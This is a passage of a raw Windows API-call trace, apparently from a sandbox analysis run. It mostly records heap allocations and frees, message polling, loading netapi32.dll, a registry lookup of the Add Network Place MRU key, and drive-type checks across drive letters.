lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0028.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0028.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0028.910] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889598 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889520 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a00 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a00 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889520 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1350 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895b0 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889580 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0028.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af388 | out: hHeap=0x770000) returned 1 [0028.910] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0028.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af388 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895b0 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1350 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889520 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x52) returned 0x794b90 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a00 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889520 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1350 | out: hHeap=0x770000) returned 1 [0028.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.911] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1350 [0028.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889520 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a48 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a30 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a18 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889568 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889760 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af428 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0028.912] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889748 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889718 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889748 | out: hHeap=0x770000) returned 1 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889718 | out: hHeap=0x770000) returned 1 [0028.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13a0 [0028.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889718 [0028.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889748 [0028.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889718 | out: hHeap=0x770000) returned 1 [0028.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889748 | out: hHeap=0x770000) returned 1 [0028.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.913] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x742f0000 [0028.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889700 [0028.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0028.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae948 [0028.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x7ae948, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferFree", lpUsedDefaultChar=0x0) returned 17 [0028.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889700 | out: hHeap=0x770000) returned 1 [0028.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0028.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0028.919] GetProcAddress (hModule=0x742f0000, lpProcName="NetApiBufferFree") returned 0x742e13d2 [0028.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0028.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0028.920] NetApiBufferFree (Buffer=0x7ac2f0) returned 0x0 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7f30 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897a8 | out: hHeap=0x770000) returned 1 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0028.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0028.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0028.920] FreeLibrary (hLibModule=0x742f0000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13a0 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af428 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a48 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889520 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a18 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a30 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889568 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889760 | out: hHeap=0x770000) returned 1 [0028.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1350 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889790 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897a8 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b7f30 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af418 | out: hHeap=0x770000) returned 1 [0028.923] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1350 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af418 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889760 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889760 | out: hHeap=0x770000) returned 1 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7f30 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af428 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af458 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13a0 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889760 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af448 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889760 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13a0 | out: hHeap=0x770000) returned 1 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889760 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889568 [0028.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889568 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af458 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af458 | out: hHeap=0x770000) returned 1 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889568 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a30 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a18 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a18 | out: hHeap=0x770000) returned 1 [0028.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13a0 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0028.924] PeekMessageW (in: lpMsg=0x6aeb24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb24) returned 0 [0028.924] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.924] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.924] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.924] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed268 | out: hHeap=0x770000) returned 1 [0028.924] PeekMessageW (in: lpMsg=0x6af054, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af054) returned 0 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2a8 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b44e8 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af308 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ba8 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894a8 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c20 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4478 | out: hHeap=0x770000) returned 1 [0028.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af518 | out: hHeap=0x770000) returned 1 [0028.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c48 | out: hHeap=0x770000) returned 1 [0028.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac670 | out: hHeap=0x770000) returned 1 [0028.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af388 | out: hHeap=0x770000) returned 1 [0028.925] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.925] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.925] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.925] CharUpperBuffW (in: lpsz="HKCU64", cchLength=0x6 | out: lpsz="HKCU64") returned 0x6 [0028.925] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\PublishingWizard\\AddNetworkPlace\\AddNetPlace\\LocationMRU", ulOptions=0x0, samDesired=0x20119, phkResult=0x6af0ac | out: phkResult=0x6af0ac*=0x0) returned 0x2 [0028.925] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.925] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.925] CharLowerBuffW (in: lpsz="ALL", cchLength=0x3 | out: lpsz="all") returned 0x3 [0028.925] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0028.925] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0028.925] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0028.925] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0028.926] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0028.927] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0028.928] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0028.928] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0028.928] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0028.928] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0028.928] GetDriveTypeW 